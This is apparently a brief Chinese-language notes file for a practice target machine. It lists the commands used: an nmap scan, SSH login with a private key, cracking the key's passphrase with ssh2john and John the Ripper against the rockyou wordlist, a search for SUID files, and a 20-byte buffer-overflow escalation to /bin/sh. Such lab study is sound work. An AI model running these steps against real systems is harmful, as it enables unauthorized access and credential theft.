1.扫描靶机开放的服务
nmap -sV 192.168.2.109
2.使用私钥登录靶机
#ssh -i 私匙 用户名/id
ssh -i id_rsa simon@192.168.2.109
3.解密私钥
#把私钥文件转为john可读,无法直接使用ssh2john时,使用locate查找
locate ssh2john
ssh2john id_rsa > rsacrack
#zcat解压kali密码字典破解rsacrack文件
zcat /user/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
4.查找需要root权限的文件
关于perm -4000 的解释,转载:linux:SUID、SGID详解 - fhefh - 博客园
# -prem -4000 SUID
#/dev/null 避免错误输出
find / -perm -4000 2>/dev/null
5.缓冲区溢出提权
源码中20字节缓冲区
输入20字节+/bin/sh